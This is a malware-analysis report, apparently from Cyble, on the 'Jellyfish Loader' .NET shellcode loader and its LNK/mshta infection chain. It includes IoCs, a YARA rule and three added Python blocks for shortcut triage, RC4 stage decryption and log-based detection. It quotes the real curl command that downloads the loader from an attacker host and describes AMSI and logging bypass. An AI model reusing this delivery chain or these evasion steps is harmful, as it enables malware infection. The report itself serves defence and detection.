Key Takeaways
- Cyble Research and Intelligence Labs (CRIL) has come across a new .NET-based shellcode loader named Jellyfish Loader.
- Jellyfish Loader uses asynchronous task method builders to execute code.
- The loader uses Fody and Costura to embed dependencies as resources within the executable.
- Jellyfish Loader is capable of sending system information upon initial infection and performs SSL certificate validation before Command and Control (C&C) communication.
- The C&C then sends shellcode to the victim's machine for further malicious activity.
- The C&C infrastructure, initially used by a Threat Actor (TA) in 2018 to download an encrypted PowerShell script, is now being used by Jellyfish Loader.
- The coding style of the PowerShell script used to download encrypted PowerShell content is similar to the samples observed in Olympic Destroyer, as documented by Kaspersky in 2018.
Overview
CRIL researchers came across a ZIP file, initially uploaded from Poland. The file contains a Windows shortcut (.lnk). When executed, the .lnk file opens a clean PDF and then downloads and executes a new .NET-based shellcode loader, JellyfishLoader.
The new Jellyfish Loader is notable for its lack of obfuscation: its code is clearly structured to handle secure communication through SSL certificate validation, prepare JSON payloads, send HTTP POST requests asynchronously, and download and execute shellcode. The use of `AsyncTaskMethodBuilder` and state-machine-like code is characteristic of methods generated by the C# compiler for handling asynchronous operations.
The Jellyfish Loader attempts to connect to the URL "hxxps://ping.connectivity-check[.]com" and tries to download the shellcode. However, during our testing, the shellcode was not successfully delivered. The domain "connectivity-check[.]com" is used by two malicious documents that closely resemble those used in the 2018 Olympic Destroyer operation by the Russian threat actor Hades. Olympic Destroyer was a sophisticated cyber-sabotage attack targeting the organizers, suppliers, and partners of the 2018 Winter Olympic Games in Pyeongchang, South Korea. The attack involved the spread of a destructive network worm designed to disrupt the event.
Technical Details
CRIL came across an interesting ZIP file named Lisa.pdf.zip (SHA-256: 66d24e2081fcfe3ffdcf80e208553f32b088c7e863668ab3813ba980e1efbc2c) whose origin is unknown. The file contains a .lnk file named Lisa.pdf.lnk (SHA-256: 6d47ce1660eb54a31e7870b170605f9641ec97d756fb865f3a5e357649dc2041), masquerading as a PDF file. The target of the .lnk file is configured to execute a JavaScript file using `mshta.exe`, with intentional spaces added to obscure the actual URL, as illustrated in the figure below.
Figure 1 – Properties of the LNK File
The TA has added junk data to the .lnk file to deliberately increase its size and evade detection. The figure below shows the junk data inside the shortcut file.
Figure 2 – Junk Data Embedded in the Shortcut LNK File
The target command of the .lnk file is as follows:
The remote URL hosts obfuscated JavaScript, which is executed by mshta.exe to carry out further malicious activity. The figure below shows the obfuscated JavaScript code.
Figure 3 – Obfuscated JavaScript File
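To show what triage of such a shortcut looks like in practice, here is an added Python example (not code from the original post or from Cyble) that parses the Shell Link header, StringData and ExtraData of a .lnk, recovers the target and arguments, and flags the traits described above: an mshta.exe target, a long run of spaces hiding the URL, and junk data appended after the terminal block. The sample shortcut is constructed inside the script; its URL and sizes are placeholders, not the campaign's values.

```python
import re
import struct

# Shell Link (.lnk) constants from MS-SHLLINK.
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
# StringData fields appear in this fixed order when their flag is set.
STRING_FIELDS = [("name", HAS_NAME), ("relative_path", HAS_RELPATH),
                 ("working_dir", HAS_WORKDIR), ("arguments", HAS_ARGS),
                 ("icon_location", HAS_ICON)]


def build_lnk(relative_path, arguments, junk_size):
    """Construct a minimal Unicode shortcut with junk appended after the terminal block (test data only)."""
    flags = HAS_RELPATH | HAS_ARGS | IS_UNICODE
    # HeaderSize, CLSID, LinkFlags, FileAttributes, 3 timestamps, FileSize, IconIndex,
    # ShowCommand (SW_SHOWNORMAL), HotKey, Reserved1, Reserved2, Reserved3
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LINK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    body = b""
    for text in (relative_path, arguments):
        body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    body += struct.pack("<I", 0)            # TerminalBlock (size < 4) ends ExtraData
    return header + body + b"\x00" * junk_size


def parse_lnk(data):
    """Return the StringData fields plus the size of any overlay after the terminal block."""
    if len(data) < 0x4C or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 0x4C
    if flags & HAS_ID_LIST:                 # LinkTargetIDList: u16 size + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:               # LinkInfo: u32 size that includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for key, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        fields[key] = raw.decode("utf-16-le" if width == 2 else "latin-1")
        pos += count * width
    while pos + 4 <= len(data):             # walk ExtraData blocks up to the TerminalBlock
        size = struct.unpack_from("<I", data, pos)[0]
        if size < 4:
            pos += 4
            break
        pos += size
    fields["overlay_bytes"] = max(0, len(data) - pos)
    return fields


def triage(data):
    """Parse a shortcut and return (fields, list of suspicious traits)."""
    info = parse_lnk(data)
    target = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    args = info.get("arguments", "")
    longest_gap = max((len(run) for run in re.findall(r" +", args)), default=0)
    findings = []
    if "mshta" in target:
        findings.append("target launches mshta.exe")
    if longest_gap >= 16:
        findings.append(f"{longest_gap} consecutive spaces push the real command out of the Properties view")
    if re.search(r"https?://", args, re.IGNORECASE):
        findings.append("arguments contain a remote URL")
    if info["overlay_bytes"]:
        findings.append(f"{info['overlay_bytes']} bytes of junk after the terminal block")
    return info, findings


# Constructed sample: placeholder URL and sizes, not the campaign's values.
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\mshta.exe",
                       " " * 200 + "https://example.invalid/placeholder.hta",
                       junk_size=4096)

if __name__ == "__main__":
    fields, traits = triage(SAMPLE_LNK)
    print(fields["relative_path"], repr(fields["arguments"].strip()))
    for trait in traits:
        print("-", trait)
```

Real shortcuts usually also carry a LinkTargetIDList and LinkInfo block; the parser skips both by their declared sizes, so the same function works on files dropped by Explorer. The overlay size is the signal for the junk padding described above: a legitimate shortcut ends at its terminal block.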
This malicious JavaScript file then downloads a clean PDF lure file and the newly identified Jellyfish Loader executable. The following command is executed by the malicious script to download the Jellyfish Loader:
- "C:\Windows\System32\curl.exe" "hxxps://file.compute-ec2-aws.com/BinSvc.exe" -o "C:\Users\MalWorkstation\AppData\Local\Microsoft\BinSvc.exe"
The lure file is a clean PDF containing an image of a key, making it difficult to identify the motive and target of the campaign. The figure below shows the lure document.
Figure 4 – Lure Document
Jellyfish Loader
The Jellyfish Loader "BinSvc.exe" is a 64-bit .NET-based executable with the SHA-256 hash e654e97efb6214bea46874a49e173a3f8b40ef30fd0179b1797d14bcc2c2aa6c. Analysis of the loader's code reveals that its name is JellyfishLoader, its compilation date is 2089-06-18 and its application version is 0.3.2, indicating that it is in the early stages of development.
Asynchronous Main Method
The `Main` method serves as the entry point of the application and is asynchronous, returning a `Task`. The complexity of the syntax is due to it being auto-generated code, a common feature of async methods compiled to Intermediate Language (IL). The figure below illustrates the asynchronous `Main` method.
Figure 5 – Asynchronous Main Method
Compressed DLLs
The executable uses Fody, an extensible tool for weaving .NET assemblies. Fody allows the manipulation of an assembly's Intermediate Language (IL) during the build process, a task that typically requires substantial plumbing code. Additionally, it employs Costura, a Fody add-in that embeds dependencies as resources.
The loader contains supporting DLLs that are compressed and only decompressed at execution time. The compressed DLLs are present in the Resource section of the executable. The figure below shows the compressed DLL files.
Figure 6 – Compressed DLL Files
System Information
The Jellyfish Loader extracts basic system information from the infected system and stores it as a JSON string. The figure below shows the information extracted by the Jellyfish Loader.
Figure 7 – System Details Extracted
Base64 Encoding
After gathering the system data as a JSON string, the loader obfuscates the data with Base64 encoding. The figure below shows the routine that encodes the data.
Figure 8 – Routine to Base64 Encode the System Data
C&C Communication
After encoding and staging the data, the loader uses the SendPostRequest() method, which takes a URL and a UUID as arguments and sends an HTTP POST request to the URL "hxxps://ping.connectivity-check[.]com". The figure below shows the code for C&C communication.
Figure 9 – Code for C&C Communication
SSL Certificate Validation
The loader has a method ValidateServerCertificate that validates the server's SSL certificate. It checks whether the certificate has already been validated (isCertificateValidated) and, if not, tries to validate the certificate by calling the IsCertificatePinned method. If the certificate matches the pinned certificate, it sets isCertificateValidated to true. Because only the pinned certificate is accepted, a TLS-inspecting proxy that re-signs the connection will cause the handshake to fail; repeated failed connections to the C&C host are themselves a useful detection signal. The figure below shows the code for SSL certificate validation.
Figure 10 – Code for SSL Validation
ShellCode Runner
While analyzing the loader, we observed that the C&C server did not deliver the expected shellcode, preventing further investigation. However, the loader contains a function designed to execute shellcode, suggesting it is capable of processing and executing shellcode received from the remote C&C server. The figure below shows the routine that executes shellcode.
Figure 11 – Code to Run ShellCode
Domain Analysis
As discussed previously, the C&C domain name "connectivity-check[.]com" was first seen in 2016 and has been registered under various ASNs since then, as shown below.
Figure 12 – PDNS of connectivity-check.com
The TA has predominantly used ASN 16509 (AMAZON-02) for domain registration since 2019. This suggests that the same Threat Actor may be registering the domain using different IP addresses. We have also observed that the TA has created several subdomains designed to look like legitimate connectivity checks for potential command-and-control (C&C) communication.
Figure 13 – Subdomains Registered
Interestingly, we have observed two malicious DOC files submitted to VirusTotal in 2018 that connect to the same domain "connectivity-check[.]com" to download PowerShell scripts for further malicious activity, as shown in the figure below.
Figure 14 – PowerShell Script Downloads Payload from connectivity-check.com (submitted to VT in 2018)
This script first checks whether the PowerShell version is greater than 3. If so, it disables PowerShell script logging and the Antimalware Scan Interface (AMSI) before continuing execution. It then connects to the C&C domain to retrieve an encrypted payload from the remote server. The payload is encrypted with RC4 and is decrypted using a predefined key hardcoded in the PowerShell script. Once decrypted, the content is executed with the Invoke-Expression cmdlet.
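An analyst who has recovered such a downloader script needs to decrypt the retrieved stage offline to see what it contains. The following Python is an added example, not part of the original post: it implements RC4 (key scheduling plus keystream generation) and a helper that decrypts a downloaded blob with the key lifted from the script and returns it as text for review. The sample key and stage are constructed in the script and are not the values from the real downloader.

```python
import base64


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 keystream XOR; the same call encrypts and decrypts."""
    # Key-scheduling algorithm (KSA)
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    # Pseudo-random generation algorithm (PRGA)
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_stage(blob: bytes, key: bytes, base64_wrapped: bool = False) -> str:
    """Decrypt a downloaded stage with the hardcoded key and return it as text.

    The result is meant to be read, never passed to Invoke-Expression."""
    if base64_wrapped:
        blob = base64.b64decode(blob)
    return rc4(key, blob).decode("utf-8", errors="replace")


def looks_like_powershell(text: str) -> bool:
    """Cheap sanity check that the key was right: a real stage contains cmdlets or variables."""
    markers = ("Invoke-", "New-Object", "function ", "$")
    return any(marker in text for marker in markers)


# Constructed sample: a harmless stage encrypted with a made-up key (not the real script's key).
SAMPLE_KEY = b"constructed-demo-key"
SAMPLE_STAGE = "$msg = 'stage two placeholder'; Write-Output $msg"
SAMPLE_BLOB = rc4(SAMPLE_KEY, SAMPLE_STAGE.encode())
SAMPLE_BLOB_B64 = base64.b64encode(SAMPLE_BLOB)

if __name__ == "__main__":
    # Published RC4 test vector: key "Key", plaintext "Plaintext" -> bbf316e8d940af0ad3
    print(rc4(b"Key", b"Plaintext").hex())
    recovered = decrypt_stage(SAMPLE_BLOB, SAMPLE_KEY)
    print(recovered, looks_like_powershell(recovered))
```

Because RC4 is a stream cipher, a wrong key produces plausible-looking byte soup rather than an error, so the `looks_like_powershell` check is the only hint that the key recovered from the downloader was the right one.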
Our investigation further revealed similarities in the coding style used for disabling script logging, RC4 decryption, and the function designed to download encrypted data, resembling techniques documented in Kaspersky's 2018 Olympic Destroyer blog. Kaspersky later attributed Olympic Destroyer to the Hades group, which used Empire PowerShell, an open-source post-exploitation framework, as its final payload.
Figure 15 – Coding Style Similarities
Identifying the precise threat actor responsible for the Jellyfish Loader is challenging. Our research aims to document these findings for reference, illustrating the observed similarities and potential associations without conclusively linking the Jellyfish Loader to the Hades group. Further investigation and collaboration are needed to validate and expand upon these observations.
Conclusion
The Jellyfish Loader uses tools such as Fody and Costura for dependency embedding and asynchronous task methods for execution. It gathers system information, validates the server's SSL certificate, and then initiates command-and-control (C&C) communication, downloading shellcode for subsequent malicious operations. Although we cannot definitively confirm this as the work of the Hades group, the investigation shows similarities, suggesting a new malware variant. Additional investigation and collaboration are essential to validate and substantiate this potential association.
Our Recommendations
Following are our recommendations against the Jellyfish Loader campaign.
- Deploy robust antivirus and anti-malware solutions that can detect and mitigate shellcode-based attacks. Regularly update signatures and heuristic detection capabilities.
- Segment your network to limit the lateral movement of malware within your organization, reducing the impact of a potential breach.
- Implement application whitelisting to allow only authorized applications to execute, thereby preventing unauthorized shellcode from running.
- Employ continuous network monitoring to detect unusual traffic patterns or connections indicative of shellcode execution or command-and-control (C&C) communications.
- Continuously monitor network traffic for unusual activity, such as attempts to connect to known malicious URLs or unexpected data exfiltration attempts.
- Implement SSL/TLS inspection to monitor encrypted traffic and detect malicious activity hidden within secure communications.
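The monitoring recommendations above can be turned into concrete checks. The Python below is an added example (not from the original post) that runs simple detection logic over constructed Sysmon-style process events and proxy log lines: it flags mshta.exe launched with a URL and a padded command line, curl.exe spawned by mshta.exe writing into AppData\Local, binaries run from AppData\Local by mshta.exe, file hashes from the report's IoC table, and POSTs to the C&C host, decoding the Base64-encoded JSON body the loader sends. Hosts other than the C&C domain, user names, timestamps, the beacon fields and the non-IoC hashes are constructed placeholders.

```python
import base64
import json
import re

# Values from the report's IoC table; everything else in this script is constructed.
IOC_SHA256 = {
    "66d24e2081fcfe3ffdcf80e208553f32b088c7e863668ab3813ba980e1efbc2c": "Lisa.pdf.zip",
    "6d47ce1660eb54a31e7870b170605f9641ec97d756fb865f3a5e357649dc2041": "Lisa.pdf.lnk",
    "e654e97efb6214bea46874a49e173a3f8b40ef30fd0179b1797d14bcc2c2aa6c": "Jellyfish Loader (BinSvc.exe)",
}
IOC_HOSTS = {"ping.connectivity-check.com"}

# Constructed Sysmon-style process-creation events (user, hosts and non-IoC hashes are placeholders).
PROCESS_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta.exe" + " " * 40 + "https://example.invalid/placeholder.hta", "sha256": "0" * 64},
    {"image": r"C:\Windows\System32\curl.exe", "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\curl.exe" "https://example.invalid/BinSvc.exe" -o "C:\Users\alice\AppData\Local\Microsoft\BinSvc.exe"',
     "sha256": "1" * 64},
    {"image": r"C:\Users\alice\AppData\Local\Microsoft\BinSvc.exe", "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": "BinSvc.exe", "sha256": "e654e97efb6214bea46874a49e173a3f8b40ef30fd0179b1797d14bcc2c2aa6c"},
    {"image": r"C:\Program Files\Tool\tool.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "tool.exe --update", "sha256": "2" * 64},
]

# Constructed proxy log: "<time> <client> <method> <host> <path> <status> <post-body-or-dash>".
# The beacon body mimics the loader's Base64(JSON) format with made-up fields.
_BEACON = base64.b64encode(json.dumps({"hostname": "WS01", "user": "alice", "os": "Windows 10"}).encode()).decode()
PROXY_LOG = [
    "2024-07-03T10:01:12Z 10.0.0.5 GET example.invalid /placeholder.hta 200 -",
    "2024-07-03T10:01:40Z 10.0.0.5 POST ping.connectivity-check.com / 200 " + _BEACON,
    "2024-07-03T10:02:01Z 10.0.0.7 GET www.example.com / 200 -",
]


def check_process(ev):
    """Return the detection names that fire on one process-creation event."""
    image, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmdline"]
    hits = []
    if image.endswith("mshta.exe") and re.search(r"https?://", cmd, re.I):
        hits.append("mshta.exe launched with a remote URL")
    if image.endswith("mshta.exe") and re.search(r" {8,}", cmd):
        hits.append("long whitespace run in mshta.exe command line")
    if image.endswith("curl.exe") and parent.endswith("mshta.exe") \
            and re.search(r"-o\s+\"?[^\"]*\\appdata\\local\\", cmd, re.I):
        hits.append("curl.exe spawned by mshta.exe downloading into AppData\\Local")
    if parent.endswith("mshta.exe") and "\\appdata\\local\\" in image:
        hits.append("mshta.exe executed a binary from AppData\\Local")
    if ev["sha256"].lower() in IOC_SHA256:
        hits.append("hash matches IoC: " + IOC_SHA256[ev["sha256"].lower()])
    return hits


def check_proxy(line):
    """Return a finding for a request to the C&C host, decoding a Base64 JSON POST body if present."""
    ts, client, method, host, path, status, body = line.split(" ", 6)
    if host.lower() not in IOC_HOSTS:
        return None
    finding = {"time": ts, "client": client, "method": method, "host": host, "path": path, "body": None}
    if method == "POST" and body != "-":
        try:
            finding["body"] = json.loads(base64.b64decode(body, validate=True))
        except ValueError:          # binascii.Error and JSONDecodeError both derive from ValueError
            finding["body"] = "undecodable"
    return finding


def run():
    """Evaluate every constructed event and log line; returns (process hits by image, network findings)."""
    process_hits = {ev["image"]: check_process(ev) for ev in PROCESS_EVENTS}
    network = [f for f in map(check_proxy, PROXY_LOG) if f]
    return process_hits, network


if __name__ == "__main__":
    process_hits, network = run()
    for image, hits in process_hits.items():
        print(image, hits)
    print(network)
```

The process rules are behavioural and do not depend on the sample hashes, so they keep working when the TA rebuilds the loader; the hash and host lookups catch the known artefacts exactly. Decoding the POST body also gives the responder the victim details the loader reported, which is useful for scoping.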
MITRE ATT&CK® Techniques

| Tactic | Technique | Procedure |
|---|---|---|
| Execution (TA0002) | User Execution: Malicious Link (T1204.001) | The .lnk file masquerades as a PDF file and requires user interaction to be executed. |
| Defense Evasion (TA0005) | Masquerading: Masquerade File Type (T1036.003) | The .lnk file is named to appear as a PDF file to deceive users. |
| Discovery (TA0007) | System Information Discovery (T1082) | Jellyfish Loader collects and sends basic system information from the infected machine. |
| Command and Control (TA0011) | Encrypted Channel (T1573) | The loader uses SSL certificate validation for secure C&C communication. |
| Command and Control (TA0011) | Application Layer Protocol: Web Protocols (T1071.001) | The loader sends HTTP POST requests to communicate with its C&C server. |
| Exfiltration (TA0010) | Exfiltration Over C2 Channel (T1041) | System information and potentially other data are exfiltrated over the established C&C channel. |
Indicators of Compromise

| Indicator | Indicator Type | Description |
|---|---|---|
| ab9c3ef0b8bb1d68d819d569c8276af0 | MD5 | Lisa.pdf.zip |
| 00e0824e139e21fd6e41e2a34c1d6f598d7e4fbe | SHA-1 | Lisa.pdf.zip |
| 66d24e2081fcfe3ffdcf80e208553f32b088c7e863668ab3813ba980e1efbc2c | SHA-256 | Lisa.pdf.zip |
| 300b380bf870010f14bfeeeccbdc9729 | MD5 | Lisa.pdf.lnk |
| d4adb79a3809989569fb24aa43c947ef69b8aee1 | SHA-1 | Lisa.pdf.lnk |
| 6d47ce1660eb54a31e7870b170605f9641ec97d756fb865f3a5e357649dc2041 | SHA-256 | Lisa.pdf.lnk |
| e577fa8e0491fe027bc4da86a01f64ea | MD5 | Jellyfish Loader |
| 9ff473df01487ca59d6426c8fddf77a1c27b2437 | SHA-1 | Jellyfish Loader |
| e654e97efb6214bea46874a49e173a3f8b40ef30fd0179b1797d14bcc2c2aa6c | SHA-256 | Jellyfish Loader |
| hxxps://ping.connectivity-check[.]com/ | URL | C&C URL |
Yara Rule

```yara
rule Jellyfish_Loader
{
    meta:
        author = "CRIL"
        description = "Yara Rule to Identify Jellyfish Loader"
        target_entity = "Windows executable Files"
    strings:
        $str1 = "costura.system" wide ascii
        $str2 = "qemu-ga.pdb" wide ascii
        $str3 = "connectivity-check.com" wide ascii
        $str4 = "Jellyfish" wide ascii
    condition:
        all of ($str*)
}
```